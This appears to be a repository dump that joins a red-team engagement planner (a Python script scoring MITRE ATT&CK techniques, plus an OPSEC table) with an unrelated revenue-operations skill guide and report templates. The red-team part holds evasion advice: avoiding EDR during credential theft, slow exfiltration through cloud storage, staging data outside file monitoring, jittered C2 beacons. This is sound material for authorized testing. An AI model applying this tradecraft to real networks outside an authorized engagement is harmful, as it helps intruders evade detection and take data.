The engagement planner flags scope violations when a technique requires a prerequisite that is not reachable from the specified access level. Example: `T1550.002 Pass-the-Hash` requires `credential_access` as a prerequisite. If the plan specifies `access-level external`, the technique will generate a scope violation because credential access is not reachable from external without first completing initial access and execution phases.
---
## OPSEC Risk Registry
| Tactic | Risk Description | Detection Likelihood | Mitigation in Engagement |
|--------|-----------------|--------------------|-----------------------------|
| credential_access | LSASS memory access logged by EDR | High | Use DCSync or Kerberoasting instead of direct LSASS dump |
| execution | PowerShell ScriptBlock logging enabled in most orgs | High | Use alternate execution (compiled binaries, COM objects) |
| lateral_movement | NTLM Event 4624 type 3 correlates source/destination | Medium | Use Kerberos; avoid NTLM over the wire where possible |
| persistence | Scheduled task creation generates Event 4698 | Medium | Use less-monitored persistence (COM hijacking, DLL side-load) within scope |
| exfiltration | Large outbound transfers trigger DLP | Medium | Use slow exfil (<100KB/min); leverage allowed cloud storage |
| collection | Staging directory access triggers file integrity monitoring | Low-Medium | Stage in user-writable directories not covered by FIM |
FILE:scripts/engagement_planner.py
#!/usr/bin/env python3
"""
engagement_planner.py — Red Team Engagement Planner
Builds a structured red team engagement plan from target scope, MITRE ATT&CK
technique selection, access level, and crown jewel assets. Scores techniques
by detection risk and effort, assembles kill-chain phases, identifies choke
points, and generates OPSEC risk items.
IMPORTANT: Authorization is required. Use --authorized flag only after obtaining
signed Rules of Engagement (RoE) and written executive authorization.
Usage:
python3 engagement_planner.py --techniques T1059,T1078,T1003 --access-level external --authorized --json
python3 engagement_planner.py --techniques T1059,T1078 --crown-jewels "DB,AD" --access-level credentialed --authorized --json
python3 engagement_planner.py --list-techniques
Exit codes:
0 Engagement plan generated successfully
1 Missing authorization or invalid input
2 Scope violation or technique outside access-level constraints
"""
import argparse
import json
import sys
MITRE_TECHNIQUES = {
"T1059": {"name": "Command and Scripting Interpreter", "tactic": "execution",
"detection_risk": 0.7, "prerequisites": ["initial_access"], "access_level": "internal"},
"T1059.001": {"name": "PowerShell", "tactic": "execution",
"detection_risk": 0.8, "prerequisites": ["initial_access"], "access_level": "internal"},
"T1078": {"name": "Valid Accounts", "tactic": "initial_access",
"detection_risk": 0.3, "prerequisites": [], "access_level": "external"},
"T1078.004": {"name": "Valid Accounts: Cloud Accounts", "tactic": "initial_access",
"detection_risk": 0.3, "prerequisites": [], "access_level": "external"},
"T1003": {"name": "OS Credential Dumping", "tactic": "credential_access",
"detection_risk": 0.9, "prerequisites": ["initial_access", "privilege_escalation"], "access_level": "internal"},
"T1003.001": {"name": "LSASS Memory", "tactic": "credential_access",
"detection_risk": 0.95, "prerequisites": ["initial_access", "privilege_escalation"], "access_level": "credentialed"},
"T1021": {"name": "Remote Services", "tactic": "lateral_movement",
"detection_risk": 0.6, "prerequisites": ["initial_access", "credential_access"], "access_level": "internal"},
"T1021.002": {"name": "SMB/Windows Admin Shares", "tactic": "lateral_movement",
"detection_risk": 0.7, "prerequisites": ["initial_access", "credential_access"], "access_level": "internal"},
"T1055": {"name": "Process Injection", "tactic": "defense_evasion",
"detection_risk": 0.85, "prerequisites": ["initial_access"], "access_level": "internal"},
"T1190": {"name": "Exploit Public-Facing Application", "tactic": "initial_access",
"detection_risk": 0.5, "prerequisites": [], "access_level": "external"},
"T1566": {"name": "Phishing", "tactic": "initial_access",
"detection_risk": 0.4, "prerequisites": [], "access_level": "external"},
"T1566.001": {"name": "Spearphishing Attachment", "tactic": "initial_access",
"detection_risk": 0.5, "prerequisites": [], "access_level": "external"},
"T1098": {"name": "Account Manipulation", "tactic": "persistence",
"detection_risk": 0.6, "prerequisites": ["initial_access", "privilege_escalation"], "access_level": "credentialed"},
"T1136": {"name": "Create Account", "tactic": "persistence",
"detection_risk": 0.7, "prerequisites": ["initial_access"], "access_level": "internal"},
"T1053": {"name": "Scheduled Task/Job", "tactic": "persistence",
"detection_risk": 0.6, "prerequisites": ["initial_access"], "access_level": "internal"},
"T1486": {"name": "Data Encrypted for Impact", "tactic": "impact",
"detection_risk": 0.99, "prerequisites": ["initial_access", "lateral_movement"], "access_level": "credentialed"},
"T1530": {"name": "Data from Cloud Storage", "tactic": "collection",
"detection_risk": 0.4, "prerequisites": ["initial_access"], "access_level": "internal"},
"T1041": {"name": "Exfiltration Over C2 Channel", "tactic": "exfiltration",
"detection_risk": 0.65, "prerequisites": ["initial_access", "collection"], "access_level": "internal"},
"T1048": {"name": "Exfiltration Over Alternative Protocol", "tactic": "exfiltration",
"detection_risk": 0.5, "prerequisites": ["initial_access", "collection"], "access_level": "internal"},
"T1083": {"name": "File and Directory Discovery", "tactic": "discovery",
"detection_risk": 0.3, "prerequisites": ["initial_access"], "access_level": "internal"},
"T1082": {"name": "System Information Discovery", "tactic": "discovery",
"detection_risk": 0.2, "prerequisites": ["initial_access"], "access_level": "internal"},
"T1057": {"name": "Process Discovery", "tactic": "discovery",
"detection_risk": 0.25, "prerequisites": ["initial_access"], "access_level": "internal"},
"T1068": {"name": "Exploitation for Privilege Escalation", "tactic": "privilege_escalation",
"detection_risk": 0.8, "prerequisites": ["initial_access"], "access_level": "internal"},
"T1484": {"name": "Domain Policy Modification", "tactic": "privilege_escalation",
"detection_risk": 0.85, "prerequisites": ["initial_access", "privilege_escalation"], "access_level": "credentialed"},
"T1562": {"name": "Impair Defenses", "tactic": "defense_evasion",
"detection_risk": 0.9, "prerequisites": ["initial_access", "privilege_escalation"], "access_level": "credentialed"},
"T1070": {"name": "Indicator Removal", "tactic": "defense_evasion",
"detection_risk": 0.75, "prerequisites": ["initial_access"], "access_level": "internal"},
"T1195": {"name": "Supply Chain Compromise", "tactic": "initial_access",
"detection_risk": 0.2, "prerequisites": [], "access_level": "external"},
"T1218": {"name": "System Binary Proxy Execution", "tactic": "defense_evasion",
"detection_risk": 0.6, "prerequisites": ["initial_access"], "access_level": "internal"},
"T1105": {"name": "Ingress Tool Transfer", "tactic": "command_and_control",
"detection_risk": 0.55, "prerequisites": ["initial_access"], "access_level": "internal"},
}
ACCESS_LEVEL_HIERARCHY = {"external": 0, "internal": 1, "credentialed": 2}
OPSEC_RISKS = [
{"risk": "C2 beacon interval too frequent", "severity": "high",
"mitigation": "Use jitter (25-50%) on beacon intervals; minimum 30s base interval for stealth",
"relevant_tactics": ["command_and_control"]},
{"risk": "Infrastructure reuse across engagements", "severity": "critical",
"mitigation": "Provision fresh C2 infrastructure per engagement; never reuse domains or IPs",
"relevant_tactics": ["command_and_control", "initial_access"]},
{"risk": "Scanning during business hours from non-business IP", "severity": "medium",
"mitigation": "Schedule active scanning to match target business hours and geographic timezone",
"relevant_tactics": ["discovery"]},
{"risk": "Known tool signatures in memory or on disk", "severity": "high",
"mitigation": "Use custom-compiled tools or obfuscated variants; avoid default Cobalt Strike profiles",
"relevant_tactics": ["execution", "lateral_movement"]},
{"risk": "Credential dumping without EDR bypass", "severity": "critical",
"mitigation": "Assess EDR coverage before credential dumping; use protected-mode aware approaches",
"relevant_tactics": ["credential_access"]},
{"risk": "Large data transfer without staging", "severity": "high",
"mitigation": "Stage data locally, compress and encrypt before exfil; avoid single large transfers",
"relevant_tactics": ["exfiltration", "collection"]},
{"risk": "Operating outside authorized time window", "severity": "critical",
"mitigation": "Confirm maintenance and testing windows with client before operational phases",
"relevant_tactics": []},
{"risk": "Leaving artifacts in temp directories", "severity": "medium",
"mitigation": "Clean up all dropped files and created accounts before disengaging",
"relevant_tactics": ["execution", "persistence"]},
]
KILL_CHAIN_PHASE_ORDER = [
"initial_access", "execution", "persistence", "privilege_escalation",
"defense_evasion", "credential_access", "discovery", "lateral_movement",
"collection", "command_and_control", "exfiltration", "impact"
]
def list_techniques():
"""Print a formatted table of all MITRE techniques and exit."""
print(f"{'ID':<12} {'Name':<45} {'Tactic':<25} {'Det.Risk':<10} {'Access'}")
print("-" * 110)
for tid, data in sorted(MITRE_TECHNIQUES.items()):
print(
f"{tid:<12} {data['name']:<45} {data['tactic']:<25} "
f"{data['detection_risk']:<10.2f} {data['access_level']}"
)
sys.exit(0)
def build_engagement_plan(techniques_input, access_level, crown_jewels, target_count):
"""
Core planning algorithm. Returns (plan_dict, scope_violations_count).
"""
provided_level = ACCESS_LEVEL_HIERARCHY[access_level]
valid_techniques = []
scope_violations = []
not_found = []
for tid in techniques_input:
tid = tid.strip().upper()
if tid not in MITRE_TECHNIQUES:
not_found.append(tid)
continue
tech = MITRE_TECHNIQUES[tid]
required_level = ACCESS_LEVEL_HIERARCHY[tech["access_level"]]
if required_level > provided_level:
scope_violations.append({
"technique_id": tid,
"technique_name": tech["name"],
"reason": (
f"Requires '{tech['access_level']}' access; "
f"provided access level is '{access_level}'"
),
})
continue
effort_score = round(tech["detection_risk"] * (len(tech["prerequisites"]) + 1), 4)
valid_techniques.append({
"id": tid,
"name": tech["name"],
"tactic": tech["tactic"],
"detection_risk": tech["detection_risk"],
"prerequisites": tech["prerequisites"],
"effort_score": effort_score,
})
# Group by tactic and order phases by kill chain
tactic_map = {}
for t in valid_techniques:
tactic_map.setdefault(t["tactic"], []).append(t)
phases = []
tactics_present = set(tactic_map.keys())
for phase_name in KILL_CHAIN_PHASE_ORDER:
if phase_name in tactic_map:
techniques_in_phase = sorted(
tactic_map[phase_name], key=lambda x: x["effort_score"], reverse=True
)
phases.append({
"phase": phase_name,
"techniques": techniques_in_phase,
})
# Identify choke points
# A choke point is a credential_access or privilege_escalation technique
# that other selected techniques list as a prerequisite dependency,
# especially relevant when crown jewels are specified.
choke_tactic_set = {"credential_access", "privilege_escalation"}
choke_points = []
for t in valid_techniques:
if t["tactic"] not in choke_tactic_set:
continue
# Count how many other techniques depend on this tactic
dependents = [
other["id"]
for other in valid_techniques
if t["tactic"] in other["prerequisites"] and other["id"] != t["id"]
]
# If crown jewels are specified, flag anything in those choke tactics
crown_jewel_relevant = bool(crown_jewels)
if dependents or crown_jewel_relevant:
choke_points.append({
"technique_id": t["id"],
"technique_name": t["name"],
"tactic": t["tactic"],
"dependent_technique_count": len(dependents),
"dependent_techniques": dependents,
"crown_jewel_relevant": crown_jewel_relevant,
"note": (
"Blocking this technique disrupts the downstream kill-chain. "
"Priority hardening target."
),
})
# Collect OPSEC risks for tactics present in the selected techniques
seen_risks = set()
applicable_opsec = []
for risk_item in OPSEC_RISKS:
relevant = risk_item["relevant_tactics"]
# Include universal risks (empty relevant_tactics list) always
if not relevant or tactics_present.intersection(relevant):
key = risk_item["risk"]
if key not in seen_risks:
seen_risks.add(key)
applicable_opsec.append(risk_item)
# Estimate duration: sum detection_risk * 2 days per phase, minimum 3 days
raw_duration = sum(
tech["detection_risk"] * 2
for t in valid_techniques
for tech in [t] # flatten
)
# Per-phase minimum: ensure at least 0.5 day per phase
phase_count = len(phases)
estimated_days = max(3.0, round(raw_duration + phase_count * 0.5, 1))
# Scale by target_count (each additional target adds 20% duration)
if target_count and target_count > 1:
estimated_days = round(estimated_days * (1 + (target_count - 1) * 0.2), 1)
# Required authorizations list
required_authorizations = [
"Signed Rules of Engagement (RoE) document",
"Written executive/CISO authorization",
"Defined scope and out-of-scope assets list",
"Emergency stop contact and escalation path",
"Deconfliction process with SOC/Blue Team",
]
if "impact" in tactics_present:
required_authorizations.append(
"Specific written authorization for destructive/impact techniques (T14xx)"
)
if "credential_access" in tactics_present:
required_authorizations.append(
"Written authorization for credential capture and handling procedures"
)
plan = {
"engagement_summary": {
"access_level": access_level,
"crown_jewels": crown_jewels,
"target_count": target_count or 1,
"techniques_requested": len(techniques_input),
"techniques_valid": len(valid_techniques),
"techniques_not_found": not_found,
"estimated_duration_days": estimated_days,
},
"phases": phases,
"choke_points": choke_points,
"opsec_risks": applicable_opsec,
"scope_violations": scope_violations,
"required_authorizations": required_authorizations,
}
return plan, len(scope_violations)
def main():
parser = argparse.ArgumentParser(
description="Red Team Engagement Planner — Builds structured engagement plans from MITRE ATT&CK techniques.",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog=(
"Examples:\n"
" python3 engagement_planner.py --techniques T1059,T1078,T1003 --access-level external --authorized --json\n"
" python3 engagement_planner.py --techniques T1059,T1078 --crown-jewels 'DB,AD' --access-level credentialed --authorized --json\n"
" python3 engagement_planner.py --list-techniques\n"
"\nExit codes:\n"
" 0 Engagement plan generated successfully\n"
" 1 Missing authorization or invalid input\n"
" 2 Scope violation or technique outside access-level constraints"
),
)
parser.add_argument(
"--techniques",
type=str,
default="",
help="Comma-separated MITRE ATT&CK technique IDs (e.g. T1059,T1078,T1003)",
)
parser.add_argument(
"--access-level",
choices=["external", "internal", "credentialed"],
default="external",
help="Attacker access level for this engagement (default: external)",
)
parser.add_argument(
"--crown-jewels",
type=str,
default="",
help="Comma-separated crown jewel asset labels (e.g. 'DB,AD,PaymentSystem')",
)
parser.add_argument(
"--target-count",
type=int,
default=1,
help="Number of target systems/segments (affects duration estimate, default: 1)",
)
parser.add_argument(
"--authorized",
action="store_true",
help="Confirms signed RoE and executive authorization have been obtained",
)
parser.add_argument(
"--json",
action="store_true",
dest="output_json",
help="Output results as JSON",
)
parser.add_argument(
"--list-techniques",
action="store_true",
help="Print all available MITRE techniques and exit",
)
args = parser.parse_args()
if args.list_techniques:
list_techniques() # exits internally
# Authorization gate
if not args.authorized:
msg = (
"Authorization required: obtain signed RoE before planning. "
"Use --authorized flag only after legal sign-off."
)
if args.output_json:
print(json.dumps({"error": msg, "exit_code": 1}, indent=2))
else:
print(f"ERROR: {msg}", file=sys.stderr)
sys.exit(1)
if not args.techniques.strip():
msg = "No techniques specified. Use --techniques T1059,T1078,... or --list-techniques."
if args.output_json:
print(json.dumps({"error": msg, "exit_code": 1}, indent=2))
else:
print(f"ERROR: {msg}", file=sys.stderr)
sys.exit(1)
techniques_input = [t.strip() for t in args.techniques.split(",") if t.strip()]
crown_jewels = [c.strip() for c in args.crown_jewels.split(",") if c.strip()]
plan, violation_count = build_engagement_plan(
techniques_input=techniques_input,
access_level=args.access_level,
crown_jewels=crown_jewels,
target_count=args.target_count,
)
if args.output_json:
print(json.dumps(plan, indent=2))
else:
summary = plan["engagement_summary"]
print("\n=== RED TEAM ENGAGEMENT PLAN ===")
print(f"Access Level : {summary['access_level']}")
print(f"Crown Jewels : {', '.join(crown_jewels) if crown_jewels else 'Not specified'}")
print(f"Techniques : {summary['techniques_valid']}/{summary['techniques_requested']} valid")
print(f"Est. Duration : {summary['estimated_duration_days']} days")
if summary["techniques_not_found"]:
print(f"Not Found : {', '.join(summary['techniques_not_found'])}")
print("\n--- Kill-Chain Phases ---")
for phase in plan["phases"]:
print(f"\n [{phase['phase'].upper()}]")
for t in phase["techniques"]:
print(f" {t['id']:<12} {t['name']:<45} risk={t['detection_risk']:.2f} effort={t['effort_score']:.3f}")
print("\n--- Choke Points ---")
if plan["choke_points"]:
for cp in plan["choke_points"]:
print(f" {cp['technique_id']} {cp['technique_name']} — {cp['note']}")
else:
print(" None identified.")
print("\n--- OPSEC Risks ---")
for risk in plan["opsec_risks"]:
print(f" [{risk['severity'].upper()}] {risk['risk']}")
print(f" Mitigation: {risk['mitigation']}")
if plan["scope_violations"]:
print("\n--- SCOPE VIOLATIONS ---")
for sv in plan["scope_violations"]:
print(f" {sv['technique_id']}: {sv['reason']}")
print("\n--- Required Authorizations ---")
for auth in plan["required_authorizations"]:
print(f" - {auth}")
print()
if violation_count > 0:
sys.exit(2)
sys.exit(0)
if __name__ == "__main__":
main()
Phân tích sức khỏe pipeline bán hàng, độ chính xác dự báo doanh thu và hiệu quả go-to-market để tối ưu doanh thu SaaS.
---
name: "revenue-operations"
description: Analyzes sales pipeline health, revenue forecasting accuracy, and go-to-market efficiency metrics for SaaS revenue optimization. Use when analyzing sales pipeline coverage, forecasting revenue, evaluating go-to-market performance, reviewing sales metrics, assessing pipeline analysis, tracking forecast accuracy with MAPE, calculating GTM efficiency, or measuring sales efficiency and unit economics for SaaS teams.
---
# Revenue Operations
Pipeline analysis, forecast accuracy tracking, and GTM efficiency measurement for SaaS revenue teams.
> **Output formats:** All scripts support `--format text` (human-readable) and `--format json` (dashboards/integrations).
---
## Quick Start
```bash
# Analyze pipeline health and coverage
python scripts/pipeline_analyzer.py --input assets/sample_pipeline_data.json --format text
# Track forecast accuracy over multiple periods
python scripts/forecast_accuracy_tracker.py assets/sample_forecast_data.json --format text
# Calculate GTM efficiency metrics
python scripts/gtm_efficiency_calculator.py assets/sample_gtm_data.json --format text
```
---
## Tools Overview
### 1. Pipeline Analyzer
Analyzes sales pipeline health including coverage ratios, stage conversion rates, deal velocity, aging risks, and concentration risks.
**Input:** JSON file with deals, quota, and stage configuration
**Output:** Coverage ratios, conversion rates, velocity metrics, aging flags, risk assessment
**Usage:**
```bash
python scripts/pipeline_analyzer.py --input pipeline.json --format text
```
**Key Metrics Calculated:**
- **Pipeline Coverage Ratio** -- Total pipeline value / quota target (healthy: 3-4x)
- **Stage Conversion Rates** -- Stage-to-stage progression rates
- **Sales Velocity** -- (Opportunities x Avg Deal Size x Win Rate) / Avg Sales Cycle
- **Deal Aging** -- Flags deals exceeding 2x average cycle time per stage
- **Concentration Risk** -- Warns when >40% of pipeline is in a single deal
- **Coverage Gap Analysis** -- Identifies quarters with insufficient pipeline
**Input Schema:**
```json
{
"quota": 500000,
"stages": ["Discovery", "Qualification", "Proposal", "Negotiation", "Closed Won"],
"average_cycle_days": 45,
"deals": [
{
"id": "D001",
"name": "Acme Corp",
"stage": "Proposal",
"value": 85000,
"age_days": 32,
"close_date": "2025-03-15",
"owner": "rep_1"
}
]
}
```
### 2. Forecast Accuracy Tracker
Tracks forecast accuracy over time using MAPE, detects systematic bias, analyzes trends, and provides category-level breakdowns.
**Input:** JSON file with forecast periods and optional category breakdowns
**Output:** MAPE score, bias analysis, trends, category breakdown, accuracy rating
**Usage:**
```bash
python scripts/forecast_accuracy_tracker.py forecast_data.json --format text
```
**Key Metrics Calculated:**
- **MAPE** -- mean(|actual - forecast| / |actual|) x 100
- **Forecast Bias** -- Over-forecasting (positive) vs under-forecasting (negative) tendency
- **Weighted Accuracy** -- MAPE weighted by deal value for materiality
- **Period Trends** -- Improving, stable, or declining accuracy over time
- **Category Breakdown** -- Accuracy by rep, product, segment, or any custom dimension
**Accuracy Ratings:**
| Rating | MAPE Range | Interpretation |
|--------|-----------|----------------|
| Excellent | <10% | Highly predictable, data-driven process |
| Good | 10-15% | Reliable forecasting with minor variance |
| Fair | 15-25% | Needs process improvement |
| Poor | >25% | Significant forecasting methodology gaps |
**Input Schema:**
```json
{
"forecast_periods": [
{"period": "2025-Q1", "forecast": 480000, "actual": 520000},
{"period": "2025-Q2", "forecast": 550000, "actual": 510000}
],
"category_breakdowns": {
"by_rep": [
{"category": "Rep A", "forecast": 200000, "actual": 210000},
{"category": "Rep B", "forecast": 280000, "actual": 310000}
]
}
}
```
### 3. GTM Efficiency Calculator
Calculates core SaaS GTM efficiency metrics with industry benchmarking, ratings, and improvement recommendations.
**Input:** JSON file with revenue, cost, and customer metrics
**Output:** Magic Number, LTV:CAC, CAC Payback, Burn Multiple, Rule of 40, NDR with ratings
**Usage:**
```bash
python scripts/gtm_efficiency_calculator.py gtm_data.json --format text
```
**Key Metrics Calculated:**
| Metric | Formula | Target |
|--------|---------|--------|
| Magic Number | Net New ARR / Prior Period S&M Spend | >0.75 |
| LTV:CAC | (ARPA x Gross Margin / Churn Rate) / CAC | >3:1 |
| CAC Payback | CAC / (ARPA x Gross Margin) months | <18 months |
| Burn Multiple | Net Burn / Net New ARR | <2x |
| Rule of 40 | Revenue Growth % + FCF Margin % | >40% |
| Net Dollar Retention | (Begin ARR + Expansion - Contraction - Churn) / Begin ARR | >110% |
**Input Schema:**
```json
{
"revenue": {
"current_arr": 5000000,
"prior_arr": 3800000,
"net_new_arr": 1200000,
"arpa_monthly": 2500,
"revenue_growth_pct": 31.6
},
"costs": {
"sales_marketing_spend": 1800000,
"cac": 18000,
"gross_margin_pct": 78,
"total_operating_expense": 6500000,
"net_burn": 1500000,
"fcf_margin_pct": 8.4
},
"customers": {
"beginning_arr": 3800000,
"expansion_arr": 600000,
"contraction_arr": 100000,
"churned_arr": 300000,
"annual_churn_rate_pct": 8
}
}
```
---
## Revenue Operations Workflows
### Weekly Pipeline Review
Use this workflow for your weekly pipeline inspection cadence.
1. **Verify input data:** Confirm pipeline export is current and all required fields (stage, value, close_date, owner) are populated before proceeding.
2. **Generate pipeline report:**
```bash
python scripts/pipeline_analyzer.py --input current_pipeline.json --format text
```
3. **Cross-check output totals** against your CRM source system to confirm data integrity.
4. **Review key indicators:**
- Pipeline coverage ratio (is it above 3x quota?)
- Deals aging beyond threshold (which deals need intervention?)
- Concentration risk (are we over-reliant on a few large deals?)
- Stage distribution (is there a healthy funnel shape?)
5. **Document using template:** Use `assets/pipeline_review_template.md`
6. **Action items:** Address aging deals, redistribute pipeline concentration, fill coverage gaps
### Forecast Accuracy Review
Use monthly or quarterly to evaluate and improve forecasting discipline.
1. **Verify input data:** Confirm all forecast periods have corresponding actuals and no periods are missing before running.
2. **Generate accuracy report:**
```bash
python scripts/forecast_accuracy_tracker.py forecast_history.json --format text
```
3. **Cross-check actuals** against closed-won records in your CRM before drawing conclusions.
4. **Analyze patterns:**
- Is MAPE trending down (improving)?
- Which reps or segments have the highest error rates?
- Is there systematic over- or under-forecasting?
5. **Document using template:** Use `assets/forecast_report_template.md`
6. **Improvement actions:** Coach high-bias reps, adjust methodology, improve data hygiene
### GTM Efficiency Audit
Use quarterly or during board prep to evaluate go-to-market efficiency.
1. **Verify input data:** Confirm revenue, cost, and customer figures reconcile with finance records before running.
2. **Calculate efficiency metrics:**
```bash
python scripts/gtm_efficiency_calculator.py quarterly_data.json --format text
```
3. **Cross-check computed ARR and spend totals** against your finance system before sharing results.
4. **Benchmark against targets:**
- Magic Number (>0.75)
- LTV:CAC (>3:1)
- CAC Payback (<18 months)
- Rule of 40 (>40%)
5. **Document using template:** Use `assets/gtm_dashboard_template.md`
6. **Strategic decisions:** Adjust spend allocation, optimize channels, improve retention
### Quarterly Business Review
Combine all three tools for a comprehensive QBR analysis.
1. Run pipeline analyzer for forward-looking coverage
2. Run forecast tracker for backward-looking accuracy
3. Run GTM calculator for efficiency benchmarks
4. Cross-reference pipeline health with forecast accuracy
5. Align GTM efficiency metrics with growth targets
---
## Reference Documentation
| Reference | Description |
|-----------|-------------|
| [RevOps Metrics Guide](references/revops-metrics-guide.md) | Complete metrics hierarchy, definitions, formulas, and interpretation |
| [Pipeline Management Framework](references/pipeline-management-framework.md) | Pipeline best practices, stage definitions, conversion benchmarks |
| [GTM Efficiency Benchmarks](references/gtm-efficiency-benchmarks.md) | SaaS benchmarks by stage, industry standards, improvement strategies |
---
## Templates
| Template | Use Case |
|----------|----------|
| [Pipeline Review Template](assets/pipeline_review_template.md) | Weekly/monthly pipeline inspection documentation |
| [Forecast Report Template](assets/forecast_report_template.md) | Forecast accuracy reporting and trend analysis |
| [GTM Dashboard Template](assets/gtm_dashboard_template.md) | GTM efficiency dashboard for leadership review |
| [Sample Pipeline Data](assets/sample_pipeline_data.json) | Example input for pipeline_analyzer.py |
| [Expected Output](assets/expected_output.json) | Reference output from pipeline_analyzer.py |
FILE:assets/expected_output.json
{
"coverage": {
"total_pipeline_value": 1105000,
"quota": 500000,
"coverage_ratio": 2.21,
"rating": "At Risk",
"target": "3.0x - 4.0x"
},
"stage_conversions": [
{
"from_stage": "Discovery",
"to_stage": "Qualification",
"from_count": 17,
"to_count": 12,
"conversion_rate_pct": 70.6
},
{
"from_stage": "Qualification",
"to_stage": "Proposal",
"from_count": 12,
"to_count": 9,
"conversion_rate_pct": 75.0
},
{
"from_stage": "Proposal",
"to_stage": "Negotiation",
"from_count": 9,
"to_count": 5,
"conversion_rate_pct": 55.6
},
{
"from_stage": "Negotiation",
"to_stage": "Closed Won",
"from_count": 5,
"to_count": 2,
"conversion_rate_pct": 40.0
}
],
"velocity": {
"num_opportunities": 17,
"avg_deal_size": 74588.24,
"win_rate_pct": 11.8,
"avg_cycle_days": 32.5,
"velocity_per_day": 4594.2,
"velocity_per_month": 137826.09
},
"aging": {
"global_aging_threshold_days": 90,
"stage_thresholds": {
"Discovery": 90,
"Qualification": 78,
"Proposal": 67,
"Negotiation": 56
},
"total_open_deals": 15,
"healthy_deals": 13,
"at_risk_deals": 2,
"aging_deals": [
{
"id": "D011",
"name": "Vertex Solutions",
"stage": "Proposal",
"age_days": 95,
"threshold_days": 67,
"days_over": 28,
"value": 110000
},
{
"id": "D014",
"name": "Horizon Telecom",
"stage": "Negotiation",
"age_days": 60,
"threshold_days": 56,
"days_over": 4,
"value": 250000
}
]
},
"risk": {
"overall_risk": "MEDIUM",
"risk_factors_count": 3,
"concentration_risks": [],
"has_concentration_risk": false,
"stage_distribution": {
"Discovery": {
"count": 5,
"value": 194000,
"pct_of_pipeline": 17.6
},
"Qualification": {
"count": 3,
"value": 150000,
"pct_of_pipeline": 13.6
},
"Proposal": {
"count": 4,
"value": 333000,
"pct_of_pipeline": 30.1
},
"Negotiation": {
"count": 3,
"value": 428000,
"pct_of_pipeline": 38.7
}
},
"empty_stages": [],
"coverage_gaps": [
{
"quarter": "2025-Q2",
"pipeline_value": 344000,
"quarterly_target": 125000.0,
"coverage_ratio": 2.75,
"gap": "Below 3x target"
}
]
}
}
FILE:assets/forecast_report_template.md
# Forecast Accuracy Report - [Period]
## Report Details
- **Prepared By:** [Name]
- **Report Date:** [YYYY-MM-DD]
- **Period Analyzed:** [Start Period] to [End Period]
- **Periods Covered:** [N] periods
---
## Executive Summary
| Metric | Value | Rating | Trend |
|--------|-------|--------|-------|
| MAPE | _% | | |
| Weighted MAPE | _% | | |
| Forecast Bias | _% | | |
| Bias Direction | | | |
**Accuracy Rating:**
- Excellent (<10%) / Good (10-15%) / Fair (15-25%) / Poor (>25%)
**Key Finding:** [1-2 sentence summary of forecast accuracy status]
---
## Period-by-Period Analysis
| Period | Forecast | Actual | Variance | Error % | Bias |
|--------|----------|--------|----------|---------|------|
| | $_ | $_ | $_ | _% | Over/Under |
| | $_ | $_ | $_ | _% | Over/Under |
| | $_ | $_ | $_ | _% | Over/Under |
| | $_ | $_ | $_ | _% | Over/Under |
| | $_ | $_ | $_ | _% | Over/Under |
| | $_ | $_ | $_ | _% | Over/Under |
---
## Bias Analysis
### Overall Bias
- **Direction:** [Over-forecasting / Under-forecasting / Balanced]
- **Bias Magnitude:** _%
- **Over-forecast Periods:** _ of _
- **Under-forecast Periods:** _ of _
- **Bias Ratio:** _ (1.0 = always over, 0.0 = always under, 0.5 = balanced)
### Interpretation
[What does the bias pattern tell us about our forecasting process? Is it systematic or random?]
### Root Cause
[Identify the primary drivers of bias: optimistic deal assessment, poor stage qualification, sandbagging, late-arriving deals, etc.]
---
## Trend Analysis
### Accuracy Trend
- **Direction:** [Improving / Stable / Declining]
- **Early Period MAPE:** _%
- **Recent Period MAPE:** _%
- **MAPE Change:** _% (positive = worsening, negative = improving)
### Trend Chart (Text)
```
Period Error% Trend
Q1 __% ████████
Q2 __% ██████████
Q3 __% ██████
Q4 __% ████████████
```
---
## Category Breakdown
### By Rep
| Rep | Forecast | Actual | Error % | Bias | Rating |
|-----|----------|--------|---------|------|--------|
| | $_ | $_ | _% | | |
| | $_ | $_ | _% | | |
| | $_ | $_ | _% | | |
| | $_ | $_ | _% | | |
**Overall Rep MAPE:** _%
### By Segment
| Segment | Forecast | Actual | Error % | Bias | Rating |
|---------|----------|--------|---------|------|--------|
| Enterprise | $_ | $_ | _% | | |
| Mid-Market | $_ | $_ | _% | | |
| SMB | $_ | $_ | _% | | |
**Overall Segment MAPE:** _%
### By Product (if applicable)
| Product | Forecast | Actual | Error % | Bias | Rating |
|---------|----------|--------|---------|------|--------|
| | $_ | $_ | _% | | |
| | $_ | $_ | _% | | |
---
## Recommendations
### Immediate Actions (This Quarter)
1. **[Action]** -- [Why and expected impact]
2. **[Action]** -- [Why and expected impact]
3. **[Action]** -- [Why and expected impact]
### Process Improvements (Next Quarter)
1. **[Improvement]** -- [Implementation plan]
2. **[Improvement]** -- [Implementation plan]
### Coaching Focus Areas
| Rep/Team | Issue | Coaching Action | Target |
|----------|-------|-----------------|--------|
| | | | |
| | | | |
---
## Forecast Methodology Notes
### Current Methodology
[Describe the current forecasting methodology: weighted pipeline, commit/upside categories, AI-assisted, etc.]
### Methodology Changes This Period
[Any changes to the forecasting process or methodology during the reporting period]
### Data Quality Issues
[Note any data quality issues that may affect accuracy: missing close dates, inconsistent stage definitions, CRM hygiene gaps]
---
## Next Steps
| # | Action | Owner | Due Date |
|---|--------|-------|----------|
| 1 | | | |
| 2 | | | |
| 3 | | | |
FILE:assets/gtm_dashboard_template.md
# GTM Efficiency Dashboard - [Quarter/Period]
## Dashboard Details
- **Prepared By:** [Name]
- **Report Date:** [YYYY-MM-DD]
- **Period:** [Quarter or Date Range]
- **Company Stage:** [Seed / Series A / Series B / Series C+ / Growth]
---
## Metrics At A Glance
| Metric | Value | Rating | Target | Trend | vs. Last Period |
|--------|-------|--------|--------|-------|-----------------|
| Magic Number | _ | | >0.75 | | |
| LTV:CAC | _:1 | | >3:1 | | |
| CAC Payback | _ mo | | <18 mo | | |
| Burn Multiple | _x | | <2x | | |
| Rule of 40 | _% | | >40% | | |
| NDR | _% | | >110% | | |
**Rating Legend:** Green = Healthy | Yellow = Monitor | Red = Action Required
**Overall GTM Health:** [Strong / Healthy / Needs Attention / Critical]
---
## Detailed Metric Analysis
### Magic Number
| Component | Value |
|-----------|-------|
| Net New ARR | $_ |
| Prior Period S&M Spend | $_ |
| **Magic Number** | **_** |
- **Rating:** [Green / Yellow / Red]
- **Percentile:** [Top 10% / Top 25% / Median / Below Median]
- **Trend:** [Improving / Stable / Declining]
- **Interpretation:** [What does this metric tell us about GTM spend efficiency?]
